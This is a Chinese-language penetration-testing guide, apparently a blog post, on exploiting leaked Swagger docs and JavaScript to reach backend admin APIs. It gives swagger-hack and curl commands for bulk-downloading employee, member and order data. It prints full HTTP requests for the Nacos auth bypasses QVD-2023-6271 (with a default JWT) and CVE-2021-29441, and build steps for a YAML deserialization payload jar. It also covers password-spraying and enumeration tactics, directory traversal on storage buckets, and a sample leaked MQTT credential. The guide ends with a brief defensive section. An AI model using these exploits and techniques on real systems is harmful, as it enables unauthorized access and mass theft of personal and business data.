攻防渗透集锦JS泄露突破多个后台
字数 1332 2025-09-23 19:27:46

Swagger与JS泄露渗透实战指南

0x01 Swagger文档泄露利用

发现与验证

  1. 目录爆破发现Swagger文档:通过目录扫描工具发现/swagger/v1/swagger.json/swagger-ui.html
  2. 验证文档有效性
    • .json格式可直接解析
    • .html格式需查找指向的json文档路径

工具使用

  1. swagger-hack工具

    python swagger-hack2.0.py -u http://xxxxxx/swagger/v1/swagger.json
    
    • 生成swagger.csv文件包含所有API端点
    • 提取重点接口:包含listgetread等关键词的接口
  2. Burp Suite处理

    • 将提取的接口分为GET和POST两类
    • GET接口直接拼接测试
    • POST接口携带空JSON {}测试

敏感信息挖掘

  1. 接口爆破策略

    • 优先测试返回数据量大的接口
    • 关注包含configdriveruser等关键词的接口
    • 使用HAE插件辅助识别敏感响应
  2. 信息泄露案例

    {
      "brokerIP": "xx.xxx161.59",
      "brokerPort": 1883,
      "clientID": "iot-driver-001",
      "userName": "msl_mqtt_user",
      "password": "3HlcSiVhvalAq9JU"
    }
    

0x02 JS泄露与接口挖掘

前端分析

  1. Vue框架识别

    • URL中包含#符号
    • 查看源码中Vue相关特征
    • 检查异步加载的chunk文件
  2. 接口提取方法

    • 使用Packer-Fuzz提取异步JS
    • 正则匹配接口模式:
      /(?:http:|https:)?\/\/[^"']+\/(api|admin)\/[^"']+/
      
    • 人工全局搜索chunk关键词

信息泄露利用

  1. 典型泄露接口

    • 员工信息:/admin/tenant/list
    • 会员信息:/admin/user-distributor/user/list
    • 订单信息:/order/shipments/shipmentOrder/export
  2. 大数据量处理

    • 使用curl下载大容量数据:
      curl "https://xxxxxx/admin/user-distributor/user/list" > xxx.txt
      
    • 分析userid编号规律推断数据量

0x03 Nacos渗透实战

漏洞利用

  1. QVD-2023-6271权限绕过

    POST /nacos/v1/auth/users HTTP/1.1
    Host: xxxxx
    Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
    Content-Type: application/x-www-form-urlencoded
    
    username=hellonacos&password=hellonacos
    
  2. CVE-2021-29441 UA头绕过

    POST /nacos/v1/auth/users?username=hell&password=hell HTTP/1.1
    Host: xxxxx
    User-Agent: Nacos-Server
    
  3. Yaml反序列化

    • 编译payload:
      javac src/artsploit/AwesomeScriptEngineFactory.java
      jar -cvf yaml-payload.jar -C src/ .
      
    • 搭建恶意服务监听

0x04 弱口令突破技巧

账号规律分析

  1. 企业特征提取

    • 从泄露信息中提取企业简称(如MSL)
    • 分析用户名模式(如工号+姓名缩写)
  2. 密码喷洒策略

    • 固定密码+变化用户名
    • 常见弱密码组合:
      CompanyName@123
      年份+企业简称
      手机号后6位
      

实战案例

  1. 枚举检测

    • 不同账号返回不同错误信息
    • 响应时间差异判断有效账号
  2. 爆破技巧

    • 使用数值递增模式生成用户名字典
    • 优先测试简单密码(如123456)

0x05 云存储泄露利用

发现方法

  1. 接口泄露路径

    • 检查返回数据中的存储路径
    • 常见模式:
      http://xxxxxx:9000/file/
      http://xxxxxx:9000/xinyihua/
      
  2. 目录遍历测试

    • 逐层删除路径测试列目录
    • 尝试拼接/../

敏感文件获取

  1. 合同与商业信息

    • 搜索.doc.pdf等文档
    • 检查文件命名规律
  2. 配置文件泄露

    • 查找configsetting等关键词
    • 数据库连接字符串

防御建议

  1. Swagger文档

    • 生产环境禁用文档
    • 添加认证中间件
  2. 接口安全

    • 严格权限控制
    • 敏感接口添加速率限制
  3. Nacos安全

    • 及时更新补丁
    • 修改默认密钥
  4. 密码策略

    • 强制复杂度要求
    • 定期更换策略
  5. 云存储

    • 设置访问权限
    • 禁用目录列表

本指南涵盖了从信息收集到权限提升的全流程技术细节,重点突出了Swagger、JS泄露和Nacos等组件的实战利用方法,以及弱口令突破的系统化思路。

Swagger与JS泄露渗透实战指南 0x01 Swagger文档泄露利用 发现与验证 目录爆破发现Swagger文档 :通过目录扫描工具发现 /swagger/v1/swagger.json 或 /swagger-ui.html 验证文档有效性 : .json 格式可直接解析 .html 格式需查找指向的json文档路径 工具使用 swagger-hack工具 : 生成swagger.csv文件包含所有API端点 提取重点接口:包含 list 、 get 、 read 等关键词的接口 Burp Suite处理 : 将提取的接口分为GET和POST两类 GET接口直接拼接测试 POST接口携带空JSON {} 测试 敏感信息挖掘 接口爆破策略 : 优先测试返回数据量大的接口 关注包含 config 、 driver 、 user 等关键词的接口 使用HAE插件辅助识别敏感响应 信息泄露案例 : 0x02 JS泄露与接口挖掘 前端分析 Vue框架识别 : URL中包含 # 符号 查看源码中Vue相关特征 检查异步加载的chunk文件 接口提取方法 : 使用Packer-Fuzz提取异步JS 正则匹配接口模式: 人工全局搜索 chunk 关键词 信息泄露利用 典型泄露接口 : 员工信息: /admin/tenant/list 会员信息: /admin/user-distributor/user/list 订单信息: /order/shipments/shipmentOrder/export 大数据量处理 : 使用curl下载大容量数据: 分析userid编号规律推断数据量 0x03 Nacos渗透实战 漏洞利用 QVD-2023-6271权限绕过 : CVE-2021-29441 UA头绕过 : Yaml反序列化 : 编译payload: 搭建恶意服务监听 0x04 弱口令突破技巧 账号规律分析 企业特征提取 : 从泄露信息中提取企业简称(如MSL) 分析用户名模式(如工号+姓名缩写) 密码喷洒策略 : 固定密码+变化用户名 常见弱密码组合: 实战案例 枚举检测 : 不同账号返回不同错误信息 响应时间差异判断有效账号 爆破技巧 : 使用数值递增模式生成用户名字典 优先测试简单密码(如123456) 0x05 云存储泄露利用 发现方法 接口泄露路径 : 检查返回数据中的存储路径 常见模式: 目录遍历测试 : 逐层删除路径测试列目录 尝试拼接 / 和 ../ 敏感文件获取 合同与商业信息 : 搜索 .doc 、 .pdf 等文档 检查文件命名规律 配置文件泄露 : 查找 config 、 setting 等关键词 数据库连接字符串 防御建议 Swagger文档 : 生产环境禁用文档 添加认证中间件 接口安全 : 严格权限控制 敏感接口添加速率限制 Nacos安全 : 及时更新补丁 修改默认密钥 密码策略 : 强制复杂度要求 定期更换策略 云存储 : 设置访问权限 禁用目录列表 本指南涵盖了从信息收集到权限提升的全流程技术细节,重点突出了Swagger、JS泄露和Nacos等组件的实战利用方法,以及弱口令突破的系统化思路。